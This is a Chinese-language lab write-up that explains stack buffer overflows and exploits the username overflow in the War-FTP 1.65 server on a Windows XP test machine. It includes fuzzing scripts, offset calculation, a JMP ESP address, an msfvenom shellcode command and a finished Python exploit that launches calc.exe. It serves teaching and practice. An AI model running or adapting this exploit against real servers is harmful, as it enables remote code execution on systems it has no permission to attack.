缓冲区溢出攻击和实战war-ftp

前言

​ 最近看到看雪学院有篇博客写的FUZZ测试和漏洞利用，里面有介绍war-ftp 1.65版本存在缓冲区漏洞，之前有做过war-ftp 1.65的缓冲区攻击，不过当时应付差事，匆忙一做，最近学了一段时间的逆向，现在重新做做，重新理解一下。(本来这篇博客快做好了，想着有些累就睡觉了，结果一觉醒来上传到搜狗图床的图没了，淦，结果又重做了一次截了图，思路都打断了，MD)

正文

什么是缓冲区溢出

这里引用一下百度的解释

​ 缓冲区溢出是指当计算机向缓冲区内填充数据位数时超过了缓冲区本身的容量，溢出的数据覆盖在合法数据上。理想的情况是：程序会检查数据长度，而且并不允许输入超过缓冲区长度的字符。但是绝大多数程序都会假设数据长度总是与所分配的储存空间相匹配，这就为缓冲区溢出埋下隐患。操作系统所使用的缓冲区，又被称为“堆栈”，在各个操作进程之间，指令会被临时储存在“堆栈”当中，“堆栈”也会出现缓冲区溢出。

解释的很到位，但是如果了解学习过逆向和汇编的同学，我觉得下面这张图(从上面介绍的那篇博客中引用)可能会有帮助：

原博主的话：

​ 图中函数F1在调用F2之前，F1会保存F2结束以后的返回地址，然后移交给F2执行，F2执行完毕后，根据记录的返回地址复原栈帧，继续执行F1函数。在图1中可以看出，当向一个有栈溢出漏洞的程序发送大量数据时，ESP、EBP等寄存器都可以被垃圾数据淹没。由于EIP寄存器存放下一条指令的地址，因此可以编写一个Exploit程序，使EIP指向预设的一段叫做Shellcode的指令，从而达到控制系统的目的。由于栈的布局原因，通常使用JMP ESP指令来覆盖返回地址，并且将Shellcode存放到ESP处，从而引导CPU执行Shellcode。

在函数被调用的的过程中，首先将参数放到寄存器或者压入栈中，然后调用call，对于栈来说：

PUSH EIP

PUSH EBP

MOV EBP,ESP

那么此时EBP所指向的地址中保存的就是old EBP的值，用来之后恢复栈，然后call之后会在栈中压入此时执行函数的局部变量，函数执行完毕时， 可以调用leave指令当结语，也可以调整ESP的位置，释放局部变量，最后使用ret指令返回，将CPU的控制权由被调函数返回给调用函数，对于栈结构来说则会：

MOV ESP,EBP

POP EBP

POP EIP

如何利用缓冲区溢出

​ 如果被调用函数的局部变量超过了程序给它分配的空间，因为数据是从较低内存地址向较高内存地址增长的，而栈的结构是从较高内存地址向较低内存地址增长的，那么此时数据就会覆盖掉用来恢复原本栈结构的EIP内容，造成被调函数返回时，调用函数不能正确的恢复EIP的内容。

​ 而此时发现当被调用函数返回时候，寄存器EIP中内容可控，那么攻击者则可以精心构造被调用函数的局部变量，从而使用特定的值来覆盖原本保存EIP的值。

​ 为了能让CPU执行shellcode，有一种方式就是利用篡改的EIP的值，让EIP内的值指向JMP ESP指令，从而执行它，而ESP内的值是在POP EIP后，指向比覆盖EIP值的内存地址高的栈空间中，也是就在构造的覆盖EIP字节之后的几个字节中，只要找到偏移量，就可以定位到ESP指向的值，然后来设计shellcode

实战

​ 这里我们用war-ftp 1.65版本来做实验，这个软件可谓是经典缓冲区溢出攻击靶场软件(笑)，软件是用的类C语言编写的轻量级免费开源的FTP服务器软件，FTP客户端登陆时用户名存在缓冲区溢出漏洞：

（上图搜索结果显示password也有缓冲区溢出，看介绍应该是存在Windows 2000系统上，有机会测试测试）

测试环境：

操作系统：Windows XP SP3

测试软件：war-ftp 1.65

调试软件：Immunity debugger

ip地址：192.168.247.128

先FUZZ测试一下

可以看到当username过长时，程序中断崩溃，在immunity debugger上看到：

寄存器内容被覆盖(EIP内41是A的ASCII码)

这样，我们可以借用网上的POC

import socket, sys
 
target = '192.168.247.128'
payload = 'A' * int(sys.argv[1])
print "Payload length = %s\n" % sys.argv[1]
 
def send_exploit():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(1)
    s.connect((target, 21))
    try:
        s.send('user %s\r\n' % payload)
        print s.recv(1000)
        s.send('pass test\r\n')
    except:
        print "[+] server is down"
    s.close()
 
if __name__ == "__main__":
    send_exploit()

测试结果：

输入1000时候，服务器崩溃连不上，那么说明在上一次500字符用户名的时候就已经出现缓冲区溢出了。

为了确定在字符中第几个能覆盖到EIP和EBP，使用mona插件来生成1000个字符计算偏移：

生成目录在immunity debugger安装目录下

用python测试一下pattern

from ftplib import FTP

ftp = FTP()
username = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B'
port = 21
ftp.connect('192.168.247.128',port)
ftp.login(username,' ')

ftp.quit()

测试结果：

可以发现 EIP=32714131 [ESP]=71413471 用mona插件来计算一下偏移：

EIP的偏移是485

ESP的偏移是493

这意味着，向用户名发送485个字节可以定位到EIP，8个字节之后则是ESP，而485个字节后的EIP寄存器开始被缓冲区覆盖，那么EIP中486-489字节是我们想要的目标。

接下来确定JMP ESP的地址，用immunity debugger中的executable modules来找到kernel32.dll系统文件，在kernel32.dll寻找JMP ESP的地址

发现有一条JMP ESP指令的地址是0x7C86467B，那么可以给EIP赋值为0x7C86467B，则CPU运行指令就会到ESP所指向的地址，也就是输入的第493个字节之后写入shellcode

接下来生成shellcode，这里我用的是Metasploit直接生成的方式，在kali机中输入

msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -a x86 --platform windows -b '\x00\x0d\x0a\x40' -f c

其中，“-p”是指攻击载荷（payload），在windows/exec方式下可以打开计算器程序（calc.exe）；“EXITFUNC”指定退出方式；“-a x86 –platform windows”指程序运行平台，“x86、windows”是默认选项，对于本程序来说可以忽略不填，可根据实际需要填写；“-b”是排除坏字符，因为传递的都是字符串，必须要遵守字符限制的FTP 协议。这就意味着没有空，返回，换行，或是@符号，他们用16进制的表示为\x00,\x0d,\x0a,\x40。“-f”是指以C程序的方式生成Shellcode，略作修改即可在Python中使用。

那么现在可以来写exp了，首先我们要对缓冲区写入485个’A’来定位到EIP，然后写入在kernel32.dll中指令JMP ESP的地址0x7C86467B，x86程序使用小端字节序为：\x7B\x46\x86\x7C，然后再填充4个字节以便到达shellcode入口处，为了能让shellcode顺利执行，我们需要填充多个nop指令，也就是\x90字节，让CPU滑到shellcode执行。

from ftplib import FTP

shellcode = '\xbd\xc9\x0e\x48\x97\xda\xd1\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x31\x31\x68\x13\x03\x68\x13\x83\xe8\x35\xec\xbd\x6b\x2d\x73\x3d\x94\xad\x14\xb7\x71\x9c\x14\xa3\xf2\x8e\xa4\xa7\x57\x22\x4e\xe5\x43\xb1\x22\x22\x63\x72\x88\x14\x4a\x83\xa1\x65\xcd\x07\xb8\xb9\x2d\x36\x73\xcc\x2c\x7f\x6e\x3d\x7c\x28\xe4\x90\x91\x5d\xb0\x28\x19\x2d\x54\x29\xfe\xe5\x57\x18\x51\x7e\x0e\xba\x53\x53\x3a\xf3\x4b\xb0\x07\x4d\xe7\x02\xf3\x4c\x21\x5b\xfc\xe3\x0c\x54\x0f\xfd\x49\x52\xf0\x88\xa3\xa1\x8d\x8a\x77\xd8\x49\x1e\x6c\x7a\x19\xb8\x48\x7b\xce\x5f\x1a\x77\xbb\x14\x44\x9b\x3a\xf8\xfe\xa7\xb7\xff\xd0\x2e\x83\xdb\xf4\x6b\x57\x45\xac\xd1\x36\x7a\xae\xba\xe7\xde\xa4\x56\xf3\x52\xe7\x3c\x02\xe0\x9d\x72\x04\xfa\x9d\x22\x6d\xcb\x16\xad\xea\xd4\xfc\x8a\x15\x37\xd5\xe6\xbd\xee\xbc\x4b\xa0\x10\x6b\x8f\xdd\x92\x9e\x6f\x1a\x8a\xea\x6a\x66\x0c\x06\x06\xf7\xf9\x28\xb5\xf8\x2b\x4b\x58\x6b\xb7\xa2\xff\x0b\x52\xbb'
ftp = FTP()
port = 21
ftp.connect('192.168.247.128',port)
username = 'A'*485+'\x7B\x46\x86\x7C'+'A'*4+'\x90'*10+shellcode
ftp.login(username,' ')

ftp.quit()

可以看到原程序崩溃，计算器以线程方式弹出

最后，我想说的是，其实ESP之后的栈空间也是具有限制的，比如本次实验中可以发现，当以1200+个字节内容进行测试时，最终停留在了一个名为msvcrt.dll的DLL文件中，而这里的EIP与41414141完全不同。另外，当payload大小为1100字节或以下时，仍然控制着EIP。

可以通过16进制计算得到此时EIP指向的地址在msvcrt.dll文件中

由此可以计算出exp可利用的空间，这一点在写payload的时候非常重要。